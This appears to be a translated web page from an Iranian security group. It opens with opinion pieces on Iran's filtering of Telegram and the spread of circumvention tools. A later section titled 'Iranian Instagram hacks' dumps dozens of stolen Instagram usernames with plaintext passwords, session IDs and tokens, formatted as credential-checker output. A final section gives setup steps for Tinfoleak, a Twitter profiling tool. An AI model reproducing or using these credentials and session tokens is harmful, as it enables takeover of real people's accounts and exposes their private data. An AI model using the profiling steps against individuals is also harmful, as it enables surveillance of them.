A Vaccine Called Filtering

On 10 Dey 1396, the most popular foreign messenger in Iran was filtered by order of the "Supreme National Security Council", and 14 days later, on 23 Dey, the filter was lifted. According to numerous reports, Iranian subscribers make up more than 40% of this messenger's users.

Meanwhile, according to the head of the Internet Businesses Guild Association, "about half a million jobs that had moved onto these social networks, as well as several knowledge-based companies providing specialized services in this field, were suspended after the filtering."

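Also, according to Seyed Morteza Mousavian, head of the Center for the Development of Information Technology and Digital Media at the Ministry of Culture and Islamic Guidance (Ershad), the organization's official statistics record 19,000 channels carrying a Shamad registration, of which 9,000 were related to selling goods or services.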

All of you are aware of the importance of this messenger's activity in Iran in every respect, and you know the harms of filtering Telegram in full. But have you ever considered the advantages of this filtering? In your opinion, what positive effects did two weeks of filtering Telegram have? Were its advantages thought about before this messenger was filtered? Below we briefly point out a few notes on this.

1. One of the most important advantages of this golden period was the rise in society's general IT literacy: understanding the difference between various protocols, a brief acquaintance with security concepts, understanding ports and IP addresses, and using all kinds of circumvention tools. Many people learned how to use personal servers as circumvention tools and made them available to the public, and many others learned how to use these tools.

2. Another advantage of this plan was increased user security: during this period no Iranian user used Telegram from their real IP address at all, and in practice the likelihood of tracing users in criminal cases during these two weeks, provided virtual numbers were used, came close to zero.

3. Another important point, one that hurt the mobile operators, was that people became familiar with how to use Telegram's voice calls, which had long been blocked to prevent losses to the mobile operators.

4. Other advantages of this plan were Telegram's greater readiness to prevent being filtered again by launching the Telegram Open Network, or TON, in the first quarter of 2018, according to Pavel Durov, Telegram's CEO and founder, as well as the reduction of this project's completion time from three months to one month, and Telegram becoming almost impossible to filter.

Beyond the points above, some outcomes were also clearly noticeable, for example: the heavy defeat of Iranian messengers in competition with Telegram even with filtering in place, the government's inability to fully filter a social network, people's economic and livelihood dependence on social networks, the ineffectiveness of the Shamad scheme in preventing unconventional activity by Telegram channels, increased public trust in Telegram's respect for user privacy, and so on.

=-=-=-=-=-=-=

More content:

Iran Security Team

@IrSecTeam_Org

 

Telegram, the saw that can no longer be moved: Telegram is no longer a messenger for an Iranian; it is everything they need from the internet. It has its good and bad sides, but in my opinion the most important harm Telegram does to us is that Telegram is closed and holds back the growth of the Persian internet and content production. Today even people who have Telegram don't have a simple email address and see no need to have one. You no longer see bloggers; everyone starts a channel and writes their content there. Content that is never published on the real internet, and if you don't have the link to that channel or group you will never reach it. Surely this is not good. That is, it is a disaster. Why did this happen, why did Telegram become everything for us? The answer is simple: thanks to the sickle-style filtering of past years, all needs were drawn toward Telegram. In an environment where even a blog with 5 monthly users on Blogfa was not tolerated, website administrators were arrested over a single comment, and sites that were a person's everything were easily filtered, people, who have sense and intelligence of their own, felt more at ease here. But can Telegram be filtered? The answer is simple: no. When, by the gentlemen's own account, more than half a million jobs have been created on Telegram, you are no longer dealing only with entertainment or news; you are making a more important decision, because this is now tied to people's livelihoods. Of course it was predictable that Telegram might be filtered, but the events of these days showed that the decision to filter Telegram was even more wrong than the decision to steer people toward it. Why? The answer lies in 700,000 circumvention-tool downloads a day. Believe me, if we rank as the worst country for mobile malware, the reason is that there is no position higher than 1 in that table. I agree with the words of Sardar Jalali, the respected head of Passive Defense: yes, Telegram has occupied Iran, but the only reason is you, who closed off Iranians' access to a variety of global services and, in the hope that maybe, just maybe, Telegram would listen to you, went down the well on its rope and took the nation with you. You saw that in crisis conditions Telegram certainly does not close the channels you list, and filtering Telegram only affects its audience for 2 days at most.
But more interesting than the filtering of Telegram in this country is these same officials' use of the world's proper services, like Twitter. In these very circumstances the respected ministers' platform is Twitter, while Twitter has been filtered in Iran for years!! And even more interesting is that even when Telegram is not filtered you don't see an official government channel or group on it, yet at the same time you can find all of them on Twitter. Who they tweet for, I don't know :grin:. If this isn't a madhouse, tell me so I know where one is. Now we have to see what the respected government's next approach is and how it manages this disaster of Iran's internet, which gets deeper every day. Rest assured Pavel has dreamed even more colorful dreams for all of us. My suggestion is to open the world's important services to all Iranians as soon as possible, including Twitter, Facebook and YouTube, and to change the sickle approach to filtering into an approach of engagement with the world; or else to turn the sickle approach into a cleaver approach and shut absolutely everything, from Telegram and circumvention tools to anything new that comes along, forever. The only problem is that something new comes along almost every day :joy:. Or let's shut down the internet and put everyone at ease /// Of course, experience has proven that these things will surely not happen and, unfortunately, we will keep going down this same path of loosening and tightening. Jorjandi @webamoozir

Featured post

Iranian Instagram hacks

https://mohammadre2822:Mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 21, Following: 68, Posts: 2, Is_Private: false, Orginal: false @hacracker||JZYTHCEWCSQZYEELDBQJ|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 21, Following: 68, Posts: 2, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511537729\054 \”94.102.54.95\”: 29073}:1eIG0r:Uqm07rJY1vwpOd8w9ifPIZKxhIE”; csrftoken=lFTYTT9eTQlUEiNjWCyS9AcN6N9cudJv; Max-Age=31449600; rur=FRC; mid=Whg8QAALAAFROoRZeP_-BX8YaOJq; ig_vw=1024; ig_pr=1|||1511508913|0||3||||
https://flevel1:mohammad76@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 15, Following: 596, Posts: 6, Is_Private: false, Orginal: false @hacracker||OZLXVSAHCLUHNMBPEHPP|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 15, Following: 596, Posts: 6, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511547828\054 \”94.102.54.95\”: 29073}:1eIIdg:XDajvaDk7SuGfA445SxfQwIC6EY”; csrftoken=Gn66MlIxEYllu7nJ4ogjR3VkEY2NbP32; Max-Age=31449600; rur=FRC; mid=WhhjswALAAH22C6Q1D0ELd41icbb; ig_vw=1024; ig_pr=1|||1511519008|0||3||||
https://arash.ll16:mohammad80@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [authenticated”: true] – Source Length: 53 – Found data to capture: Followers: 109, Following: 324, Posts: 0, Is_Private: false, Orginal: false @hacracker||PUNMTHTSKUQZOAYFMLWN|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 109, Following: 324, Posts: 0, Is_Private: false, Orginal: false @hacracker|ds_user_id=5899140734; Max-Age=7776000; csrftoken=zwlAmXdNxXGymkFb51pWEq5duz5OB4Wi; rur=PRN; sessionid=IGSCef5761b51e319af54e7e0e1505b1cbd515b064a2a6968816c3b813bbefcc928b%3A7bdjN83HZEvpmpXroBRspZP8t1ojJN3Y%3A%7B%22_auth_user_id%22%3A5899140734%2C%22_auth_user_backend%22%3A%22accounts.backends.CaseInsensitiveModelBackend%22%2C%22_auth_user_hash%22%3A%22%22%2C%22_platform%22%3A4%2C%22_token_ver%22%3A2%2C%22_token%22%3A%225899140734%3Ap5DqukI8vD5PSZ0U9jZ3gcuDCCzZLBnF%3A6d0759dfffa0cf85bd499e8eb632624a96c2b84265f6a2abb599d66104061151%22%2C%22last_refreshed%22%3A1511552017.439031601%7D; target=””; mid=Whh0EAALAAF0ocle9AC0T1zIP51M; ig_vw=1024; ig_pr=1|||1511523196|0||3||||
https://amirhoseein168454:Amir1377@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 1,314, Following: 5,407, Posts: 21, Is_Private: false, Orginal: false @hacracker||FATYWTIHSDCAAELKTAHT|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 1,314, Following: 5,407, Posts: 21, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511580409\054 \”94.102.54.95\”: 29073}:1eIR7C:378Ko0vvFsY5I-u2R0tyVIvtY_4″; csrftoken=2zV9e3gXQFZV4PgGvufUPRLWyB2USOpu; Max-Age=31449600; rur=FRC; mid=Whji-AALAAFrdYYS5N1-u5dA4xrk; ig_vw=1024; ig_pr=1|||1511551588|0||3||||
https://amirhossein_nikfar13:Amir1379@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [authenticated”: true] – Source Length: 53 – Found data to capture: Followers: 251, Following: 692, Posts: 63, Is_Private: true, Orginal: false @hacracker||UKHBCSISXOUPYMMODGMX|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 251, Following: 692, Posts: 63, Is_Private: true, Orginal: false @hacracker|urlgen=”{\”time\”: 1511582762\054 \”94.102.54.95\”: 29073}:1eIRj9:zyzYO4BAvdhw0144TOQHBQnSA98″; ds_user_id=1423614926; Max-Age=7776000; csrftoken=CSWatTyIwXMu5lqqItDjLPMaVx7XkTpm; rur=ATN; sessionid=1423614926%3AeMGXZScQwyjhAL%3A3; target=””; mid=WhjsKQALAAH1KBQkSxHjsyRIVNzf; ig_vw=1024; ig_pr=1|||1511553940|0||3||||
https://amirp4588:Amir1380@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 629, Following: 913, Posts: 71, Is_Private: false, Orginal: false @hacracker||FBVCPYIXQSJMSKBRFRVK|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 629, Following: 913, Posts: 71, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511583212\054 \”94.102.54.95\”: 29073}:1eIRqP:sdGUPzBrVREEUwV3W-2Te1wkBfA”; csrftoken=obD4Y4XcWkWTpx9VRFcsYHRHs2SYuJYV; Max-Age=31449600; rur=FRC; mid=Whjt6wALAAEwUlG8QzXPg4ppgPcJ; ig_vw=1024; ig_pr=1|||1511554391|0||3||||
https://amir_moghimi.021:amir1370@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [authenticated”: true] – Source Length: 53 – Found data to capture: Followers: 59, Following: 575, Posts: 47, Is_Private: true, Orginal: false @hacracker||JSKWXIUZQFTMKAPRZBOZ|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 59, Following: 575, Posts: 47, Is_Private: true, Orginal: false @hacracker|urlgen=”{\”time\”: 1511584863\054 \”94.102.54.95\”: 29073}:1eISH2:AUhCbIgMnOUQU6PShcWqr3eNkDE”; ds_user_id=5672794365; Max-Age=7776000; csrftoken=W4aGeny8oB2AcahzBZ2TbjcHFUKgS9VL; rur=ASH; sessionid=IGSCf3ae64db3bce96a82bea39d1236096876c851249003b1c95d47d8b177672ee35%3AQo3D0Ut8CD4Uh4fotDdDC5KaG6iWWcGP%3A%7B%22_auth_user_id%22%3A5672794365%2C%22_auth_user_backend%22%3A%22accounts.backends.CaseInsensitiveModelBackend%22%2C%22_auth_user_hash%22%3A%22%22%2C%22_platform%22%3A4%2C%22_token_ver%22%3A2%2C%22_token%22%3A%225672794365%3AquCKEDJu5QwQHK7NwUhHDP1pCXQONJXo%3Aa2bdd7c3e13969ee1d581f118100b2db68f6b643689700190593e167c8d1c325%22%2C%22last_refreshed%22%3A1511584862.9653975964%7D; target=””; mid=Whj0XgALAAFbZxLszDHt4hC8H78W; ig_vw=1024; ig_pr=1|||1511556042|0||3||||
https://amir_urumm:amir1371@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 784, Following: 1,344, Posts: 98, Is_Private: true, Orginal: false @hacracker||DIYQCQTAFUCIZKAPMLKM|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 784, Following: 1,344, Posts: 98, Is_Private: true, Orginal: false @hacracker|urlgen=”{\”time\”: 1511585556\054 \”94.102.54.95\”: 29073}:1eISSD:KIB9D0dNjgyk_gg-aCri-7aN1Mo”; csrftoken=VDujH76TyeuxeFv5aBucGTlWzU6Mntk3; Max-Age=31449600; rur=FRC; mid=Whj3FAALAAH77_tKt_ovQ1BfkCb9; ig_vw=1024; ig_pr=1|||1511556734|0||3||||
https://amir_hurricane:amir1374@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 11, Following: 46, Posts: 0, Is_Private: false, Orginal: false @hacracker||DTACLAYWXDJPQOYEUVHN|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 11, Following: 46, Posts: 0, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511589802\054 \”94.102.54.95\”: 29073}:1eITYh:fBNutBlkEuS1C5sMQ8j24MVCjwk”; csrftoken=qgy2j8hekPv2hG8TVlDRgyJw5GecJh5r; Max-Age=31449600; rur=FRC; mid=WhkHqgALAAHSgLsJTBLGYuuRX-jD; ig_vw=1024; ig_pr=1|||1511560981|0||3||||
https://hamed_2017_asal:amir1374@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 1,992, Following: 5,824, Posts: 19, Is_Private: false, Orginal: false @hacracker||HKRKRWTURONVAZLQOVKE|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 1,992, Following: 5,824, Posts: 19, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511590192\054 \”94.102.54.95\”: 29073}:1eITey:x5U3kEloymV8mT8Tr_nFIazubYg”; csrftoken=lIkNAMHg0UCtzZYA7DNeqS8srpGt1DGY; Max-Age=31449600; rur=FRC; mid=WhkJLgALAAFevpjx4VzdAvrWjo0W; ig_vw=1024; ig_pr=1|||1511561369|0||3||||
https://a_masoud_a75:amir1375@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 143, Following: 161, Posts: 26, Is_Private: true, Orginal: false @hacracker||FHSNXAOBARUGZKOIEUGR|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 143, Following: 161, Posts: 26, Is_Private: true, Orginal: false @hacracker|urlgen=”{\”time\”: 1511591901\054 \”94.102.54.95\”: 29073}:1eIU6Y:ARJ-g2XdFAWlIFXHghGZkQ00Mqs”; csrftoken=hNYQioCGMZLUcopehBqHNWOhswGtTDqK; Max-Age=31449600; rur=FRC; mid=WhkP3AALAAGgI4sX8ngyEbbjj7qs; ig_vw=1024; ig_pr=1|||1511563079|0||3||||
https://amir.niromand.shz:amir1376@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 36, Following: 91, Posts: 16, Is_Private: true, Orginal: false @hacracker||QFZTORHDWFDOFPOLKWVE|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 36, Following: 91, Posts: 16, Is_Private: true, Orginal: false @hacracker|urlgen=”{\”time\”: 1511592925\054 \”94.102.54.95\”: 29073}:1eIUN4:VYGkF6j3iZ24wvAyL_Y7i6MIKcE”; csrftoken=Y9gks1MbyeJwfnogyYxQWG7o5jQE5kfD; Max-Age=31449600; rur=FRC; mid=WhkT3AALAAH4jNePNup1xMuPMlr_; ig_vw=1024; ig_pr=1|||1511564103|0||3||||
https://justbenyamin1:amir1377@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [authenticated”: true] – Source Length: 53 – Found data to capture: Followers: 11, Following: 30, Posts: 2, Is_Private: false, Orginal: false @hacracker||IZVKBXTEYUXVIWLZZHUG|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 11, Following: 30, Posts: 2, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511593512\054 \”94.102.54.95\”: 29073}:1eIUWW:iOzt3KG8XO8Ug-80Zk8LShHw7WA”; ds_user_id=6328988967; Max-Age=7776000; csrftoken=5CcU2b7i4mTg6rk5Oz6QesBETxzdIPtF; rur=ATN; sessionid=IGSC3e0914dcae6cd6512efd0d0de9df8c5f04f585b65a680ecad603aadcdbc6e38f%3AloeSgMm1F45IOr8E1FX6z4kz4VR6R7AO%3A%7B%22_auth_user_id%22%3A6328988967%2C%22_auth_user_backend%22%3A%22accounts.backends.CaseInsensitiveModelBackend%22%2C%22_auth_user_hash%22%3A%22%22%2C%22_platform%22%3A4%2C%22_token_ver%22%3A2%2C%22_token%22%3A%226328988967%3ADyFcgTnFZjMkeBf2MrnwhWQyWM6zjUPd%3Ae70ad7857f98fcc639979c843bc642f715d085d9c4a8fde35e9aa5bfa8272cf6%22%2C%22last_refreshed%22%3A1511593512.1341178417%7D; target=””; mid=WhkWJwALAAGMsVnkb9mCM6Sao21y; ig_vw=1024; ig_pr=1|||1511564689|0||3||||
https://bahramhp4484:amir1377@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 111, Following: 148, Posts: 1, Is_Private: false, Orginal: false @hacracker||MDYMMOAEAVTXSRANVWDL|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 111, Following: 148, Posts: 1, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511594063\054 \”94.102.54.95\”: 29073}:1eIUfP:zv9XBs0MXy3nXeCo02xFE0U8avw”; csrftoken=gjwbjRcdYurpHAt9unaSYOQE0v2Cwwze; Max-Age=31449600; rur=FRC; mid=WhkYTgALAAFxWAmriSldjhPVhM6h; ig_vw=1024; ig_pr=1|||1511565240|0||3||||
https://amirrezaaghel2017:amir1377@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 165, Following: 4,085, Posts: 12, Is_Private: true, Orginal: false @hacracker||EDNAODLDXOKNQQRMADFZ|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 165, Following: 4,085, Posts: 12, Is_Private: true, Orginal: false @hacracker|urlgen=”{\”time\”: 1511594230\054 \”94.102.54.95\”: 29073}:1eIUi7:0Jaos5Xkv5eml0qOxrnBt2QfiI8″; csrftoken=o3YTEZPnlIkke2zAxtDooe9kCZIJnmHI; Max-Age=31449600; rur=FRC; mid=WhkY9gALAAH52q8WfZB-h_dhOHrP; ig_vw=1024; ig_pr=1|||1511565408|0||3||||
https://amirhosseinkomijani97:amir1378@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 877, Following: 3,650, Posts: 23, Is_Private: false, Orginal: false @hacracker||BMUMCMDJTZVARFCIBLKP|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 877, Following: 3,650, Posts: 23, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511594629\054 \”94.102.54.95\”: 29073}:1eIUoY:jrCElNyJiH38-s8RS6rnLWRinDs”; csrftoken=OxmJWGIfDMo1EgYAzA06FZBuxlYrb57c; Max-Age=31449600; rur=FRC; mid=WhkahAALAAFkqysnniH5kqQ6Uaps; ig_vw=1024; ig_pr=1|||1511565807|0||3||||
https://nazi.6613:amir1378@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 47, Following: 115, Posts: 14, Is_Private: true, Orginal: false @hacracker||BGFZXVMLASNROWSFXIUH|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 47, Following: 115, Posts: 14, Is_Private: true, Orginal: false @hacracker|urlgen=”{\”time\”: 1511594859\054 \”94.102.54.95\”: 29073}:1eIUsG:7ycy1X8mrinLnJA4fVwsLm-ytUI”; csrftoken=CsbkOsbgTSjydEE1lpK5YjYeyLH64c9U; Max-Age=31449600; rur=FRC; mid=WhkbagALAAF_RAxe9AsaCHuCbdv8; ig_vw=1024; ig_pr=1|||1511566036|0||3||||
https://karami_amirhosein1998:amir1379@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 1,797, Following: 297, Posts: 180, Is_Private: true, Orginal: false @hacracker||AQBBCXGPOHDFTWPAQTJM|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 1,797, Following: 297, Posts: 180, Is_Private: true, Orginal: false @hacracker|urlgen=”{\”time\”: 1511595783\054 \”94.102.54.95\”: 29073}:1eIV7A:6WP_y81m_Sjfl64QbyBcONZhIP4″; csrftoken=rcAEfRWALm2Qy8f8O9tODevj2SQnmvCK; Max-Age=31449600; rur=FRC; mid=WhkfBgALAAEFVSBoQQH7_UoErfW2; ig_vw=1024; ig_pr=1|||1511566961|0||3||||
https://amirhuseinnnn:amir1379@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 47, Following: 280, Posts: 1, Is_Private: false, Orginal: false @hacracker||QXMBRMHBNBNPTFDUEFJN|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 47, Following: 280, Posts: 1, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511595893\054 \”94.102.54.95\”: 29073}:1eIV8v:yri5aibR6oWKBiWp_SCEerefAL0″; csrftoken=gQoErMU1dyFfIv9NeyINfo4oCOxSeZkI; Max-Age=31449600; rur=FRC; mid=WhkfdAALAAFtRqe9-H5LwCK3MIwE; ig_vw=1024; ig_pr=1|||1511567070|0||3||||
https://jam6399:amir1379@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 35, Following: 41, Posts: 21, Is_Private: true, Orginal: false @hacracker||VHMQVZOXVFLJXPVOCRUA|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 35, Following: 41, Posts: 21, Is_Private: true, Orginal: false @hacracker|urlgen=”{\”time\”: 1511596024\054 \”94.102.54.95\”: 29073}:1eIVB3:Jp7iY6PbnUH-IBIlkNol87ox3gg”; csrftoken=LI3UBvhI4fZl75WpiFUhRH3HZ9i0aYpy; Max-Age=31449600; rur=FRC; mid=Whkf9wALAAEcti3tDqXO6eMUVTLH; ig_vw=1024; ig_pr=1|||1511567202|0||3||||
https://md_peyman_:amir1380@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [authenticated”: true] – Source Length: 53 – Found data to capture: Followers: 153, Following: 40, Posts: 3, Is_Private: false, Orginal: false @hacracker||NVTBZPXLVZNTVOYKBCKG|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 153, Following: 40, Posts: 3, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511596710\054 \”94.102.54.95\”: 29073}:1eIVM6:HHX06aqY1uzYAw7jBcZkU399VwY”; ds_user_id=6327901837; Max-Age=7776000; csrftoken=eUMpIA9bhmrOg7UpIYu3DrLe16znmxvI; rur=FRC; sessionid=IGSC4a82a6b1ea7a31303c3262db10bb1725e4bc0fc664905ec23ca7c5dbd3d44493%3ARToYvA8P8osVSe5fMw8CygXRNiovgVV7%3A%7B%22_auth_user_id%22%3A6327901837%2C%22_auth_user_backend%22%3A%22accounts.backends.CaseInsensitiveModelBackend%22%2C%22_auth_user_hash%22%3A%22%22%2C%22_platform%22%3A4%2C%22_token_ver%22%3A2%2C%22_token%22%3A%226327901837%3Au1CQ4MU9Kbz0xPKFKHyJnkWK8gf4M2H2%3Abd83c854c07b2a4bd8d7f5b07553571d6c3a4c802a5b95c25d721e84124eaa10%22%2C%22last_refreshed%22%3A1511596708.7151811123%7D; target=””; mid=WhkipAALAAGQDOk5YauCtBMlEBoA; ig_vw=1024; ig_pr=1|||1511567887|0||3||||
https://mahsa.70.70.70:amir1380@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [authenticated”: true] – Source Length: 53 – Found data to capture: Followers: 30, Following: 17, Posts: 4, Is_Private: false, Orginal: false @hacracker||STBYFDNGBEHFIHDBKDAS|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 30, Following: 17, Posts: 4, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511596850\054 \”94.102.54.95\”: 29073}:1eIVOM:mMN4PMtojZqy5QqvW6Ld2IdbfX4″; ds_user_id=6308474199; Max-Age=7776000; csrftoken=zbOjpxShHyuW8ammDGL9xHsVUPIdKoUP; rur=ATN; sessionid=IGSC2460f015a03398fbf80ac87e71638fe284970fa8c5cdaaec056c9ea93c5bb843%3AlQIkaYInFjFHOpqOgCglyfnd9ThT3Z3z%3A%7B%22_auth_user_id%22%3A6308474199%2C%22_auth_user_backend%22%3A%22accounts.backends.CaseInsensitiveModelBackend%22%2C%22_auth_user_hash%22%3A%22%22%2C%22_platform%22%3A4%2C%22_token_ver%22%3A2%2C%22_token%22%3A%226308474199%3AMn0xrYNhsWr7GiXoa1NgkWoyvRof7WtU%3A5169bb3bb3f67c97864bdc40c3a3248725fe5b118ddf5dc926a384356348e357%22%2C%22last_refreshed%22%3A1511596850.4464466572%7D; target=””; mid=WhkjMQALAAGQzaLx5Ma8mgAYUtpi; ig_vw=1024; ig_pr=1|||1511568027|0||3||||
https://_amir.rain:amir1380@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 560, Following: 970, Posts: 19, Is_Private: false, Orginal: false @hacracker||FCUNFQPOWTLMMCWMVEOX|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 560, Following: 970, Posts: 19, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511597060\054 \”94.102.54.95\”: 29073}:1eIVRk:TZA3YRuKxGCCIBLWISg_HqqaOzk”; csrftoken=74AoeMN6n8wSL7hsd62bVaohbdnfnlwS; Max-Age=31449600; rur=FRC; mid=WhkkAwALAAEF74MMls9Arof8N1YZ; ig_vw=1024; ig_pr=1|||1511568237|0||3||||
https://davoodi3134:amir1380@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 231, Following: 302, Posts: 12, Is_Private: true, Orginal: false @hacracker||WNQGZYDUKEKEPAAWZTBE|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 231, Following: 302, Posts: 12, Is_Private: true, Orginal: false @hacracker|urlgen=”{\”time\”: 1511597307\054 \”94.102.54.95\”: 29073}:1eIVVk:QGlFBE_UR8bsO7Gll-mAfzxxRPo”; csrftoken=sQRcZ3agob5xAV8IkwGypQcvn2ZLYGi5; Max-Age=31449600; rur=FRC; mid=Whkk-wALAAHbjqYRxgb7unmv1B4M; ig_vw=1024; ig_pr=1|||1511568484|0||3||||
https://khanoom_heidarzadeh:ordibehesht@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 219, Following: 350, Posts: 36, Is_Private: false, Orginal: false @hacracker||ZMETDGUOFMHGDYTJVGKC|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 219, Following: 350, Posts: 36, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511600873\054 \”94.102.54.95\”: 29073}:1eIWRG:ME9wLHWH2BMkjKlZCcvpwZSk4GE”; csrftoken=poEwcwoOibPbUjuwYpBnnXFWvTuXET4z; Max-Age=31449600; rur=FRC; mid=Whky6AALAAFcaDElsXAcklYpW2xF; ig_vw=1024; ig_pr=1|||1511572051|0||3||||
https://abd_1266:ordibehesht@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 20, Following: 43, Posts: 0, Is_Private: true, Orginal: false @hacracker||FXGETYPZQIJIRZJSBRAL|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 20, Following: 43, Posts: 0, Is_Private: true, Orginal: false @hacracker|urlgen=”{\”time\”: 1511600949\054 \”94.102.54.95\”: 29073}:1eIWSU:gQu945UQk37HXSCnqKiYDQuweKM”; csrftoken=6MTDOVB9iQDTYuFkxNTVuoHjHbYu1obv; Max-Age=31449600; rur=FRC; mid=WhkzNAALAAFN2unptZ_dOAGk-eOJ; ig_vw=1024; ig_pr=1|||1511572126|0||3||||
https://soodabehshalikaran:khordad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 173, Following: 342, Posts: 16, Is_Private: true, Orginal: false @hacracker||FACWSLAPINDOTSBZXAOW|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 173, Following: 342, Posts: 16, Is_Private: true, Orginal: false @hacracker|urlgen=”{\”time\”: 1511605043\054 \”94.102.54.95\”: 29073}:1eIXWW:orRoSrjiq9bWf0N2xcjcvgAu6nY”; csrftoken=SzOaG6yFMxcQQNZm6hpiBydOLFPLH5I7; Max-Age=31449600; rur=FRC; mid=WhlDMgALAAH5Hcg4MStpKSmDQ_22; ig_vw=1024; ig_pr=1|||1511576220|0||3||||


More Twitter action from Iran

***OSINT-Twitter-Tinfoleak***
Go to https://apps.twitter.com/ > Register & Login > Create new app >
Go to (Keys and Access Tokens) > Copy (CONSUMER_KEY & CONSUMER_SECRET) >
Go to (Create my access token) > Copy (ACCESS_TOKEN & ACCESS_TOKEN_SECRET)
Open terminal
1. pip install tweepy
2. pip install --upgrade exifread
3. pip install oauth2
4. pip install jinja2
5. apt install python-pyexiv2 -y
6. wget https://www.isecauditors.com/sites/default/isecauditors.com/files/files/tinfoleak-2.1-SHA2017_Edition.zip
7. unzip tinfoleak-2.1-SHA2017_Edition.zip
8. cd tinfoleak-2.1-SHA2017_Edition && chmod +x *
9. leafpad tinfoleak.conf
Edit

CONSUMER_KEY =
CONSUMER_SECRET =
ACCESS_TOKEN =
ACCESS_TOKEN_SECRET =

Added

CONSUMER_KEY = (PASTE CONSUMER_KEY)
CONSUMER_SECRET = (PASTE CONSUMER_SECRET)
ACCESS_TOKEN = (PASTE ACCESS_TOKEN)
ACCESS_TOKEN_SECRET = (PASTE ACCESS_TOKEN_SECRET)

Save & Close
